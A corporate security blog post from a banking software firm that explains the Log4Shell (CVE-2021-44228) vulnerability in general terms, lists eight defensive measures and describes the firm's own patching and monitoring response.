The Log4j Zero-Day Flaw: What Is It and 8 Ways to Protect Yourself

Editor’s Note: FISPAN is currently not vulnerable to the Log4Shell (CVE-2021-44228) and has not identified any active exploits at this time.

On Friday, December 9, 2021, a vulnerability was first discovered in the popular video game Minecraft: a user could send a crafted message in the game’s chat window, enabling them to run arbitrary code (Remote Code Execution or RCE) on the server without authorization. This was found to be a vulnerability in Java's Apache library known as Log4J. Assigned a CVSS score of 10 out of 10, the highest possible score for a vulnerability, it is now officially known as CVE-2021-44228 and given the name Log4shell.

What is Log4J?

Log4J is a Java library for logging error messages in applications, a key part of Java’s logging framework, which is used in basically every Java application with logging enabled. It is used by everyone, from software developers who use it when debugging code to security professionals who use logging to keep track of what goes on in their environment.

This vulnerability is dangerous because the barrier to entry is very low — an exploit can be triggered by just sending a chat message or entering the exploit message in the search bar, and according to Java’s own installer, it currently runs in over 3 billion devices. From the Mars Rover to in-home smart fridges, everything somehow and somewhere relies on the code built around this library.

How Does the Log4shell Exploit Work?

The issue that caused this vulnerability is improper input validation, which is also part of the OWASP Top 10 Most common vulnerabilities. This means the input field does not check if the data is trusted. This exploitation is achieved by using a Java runtime interface called JNDI (Java Naming and Directory Interface). It has the ability to look up information locally or from remote servers. Any string in the following format can perform this lookup and fetch code that can be executed, hence the name "Remote Code Execution."

image1-Dec-15-2021-12-42-46-79-AM


How to Protect Against the Vulnerability

A Log4Shell vulnerability is a Zero-Day vulnerability, which means you do not have time to patch your servers — so you can be compromised at any time. However, the good news is that there are some measures you can take to decrease the risk of a successful attack on your company, plus increase the time available to take the appropriate preventative measures:

  1. Stay Up-To-Date: This is a trivial rule, but you have to implement and follow patch management procedures, not only install updates when required. As with the vulnerability example, if you had an outdated library but an up-to-date java version you would reduce your system’s vulnerability.

  2. Monitor 3rd Party Libraries: Even if your code is not vulnerable, you still use 3rd party libraries, which are not under your control. You should continuously monitor everything your code depends on. 

  3. Utilize an Endpoint and Detection (EDR) Solution: In the first wave, a new Zero-Day issue is used by automated scripts, which try to infect your system, deploy backdoors and persistent access. A good behaviour-based Endpoint and Detection (EDR) solution can protect your system from such attempts and buy some time to patch the system.

  4. 24/7 monitoring with Security Information and Event Management (SIEM) solutions: Your system should be on 24/7 monitoring and logs should be collected and processed by dedicated Security Information and Event Management solutions. Make sure you collect all information from your system, have real time alerts and response plans in place. With Log4Shell vulnerabilities you would have a chance to detect suspicious activity if you monitor any executed commands on your servers.

  5. Utilize a Web Application Firewall (WAF): WAF will not necessarily protect you from attacks on Zero-Day vulnerable services, but allows you to quickly deploy rules to prevent any exploitation of attacks.

  6. Network Segmentation:  Divide your network into isolated segments, which fully work independently, so one exploited service will not be able to infect your entire network.

  7. Have a Recovery Plan: Unfortunate, but true — anyone can be compromised, so you should be able to recover your infrastructure even if everything is encrypted, destroyed, or compromised. It's good to have classic backups, but better to think about infrastructure as a code to automate your backup procedures and recover quickly.

  8. Threat Hunting: Threat Hunting is the practice of proactively searching for cyber threats. Rather than getting information about new issues from your clients, cyber security teams should monitor as many sources of information as possible, including RSS fields.

This list is not exhaustive as there are many possible recommendations available.

FISPAN’s Steps to Reduce Vulnerabilities

With FISPAN’s constant monitoring for security threats, we were notified about the new Zero-Day vulnerability promptly, and FISPAN immediately took preventative measures:

  • FISPAN continuously scans all its source code and 3rd party libraries so it was easy to identify any potentially vulnerable libraries.
  • The Security and Engineering team started to take appropriate actions to upgrade the library to the latest version and implemented appropriate prevention and monitoring measures to protect FISPAN products against this vulnerability.
  • Together with the remediation process, FISPAN’s Security Team performed automated and manual tests for all potentially vulnerable services to detect any issues.

Based on our research, despite the usage of a vulnerable library, FISPAN was not affected by any of the published exploits, as FISPAN’s library was used in conjunction with up-to-date Java.

What's Next?

As this situation evolves rapidly, we can expect the intensity of attacks to only increase. Your best courses of action are to keep up to date with changes, stay vigilant and last but not least, follow security best practices.

Have Questions About Cyber Security?

Learn more about the state of commercial banking and security in this Security Boulevard article from FISPAN's own Head of Cyber Security, Maryam Hamidirad.

Our security team is also available to answer any questions you may have and can be reached at securityteam@fispan.com.

Back to Blog

Related Articles

How To Be Smart About ERPs When Selling Treasury Services

Banks understand that in order to attract and retain customers, they must be convenient and provide...

The Implications of Real-Time Payments with Lou Towchik

Lou Towchik retired in April 2020 after serving for 38 years in various management roles at...

How Banks Can Protect Themselves from Losing Customers

It wasn’t long ago that banking customers would remain loyal for life. That’s not because they were...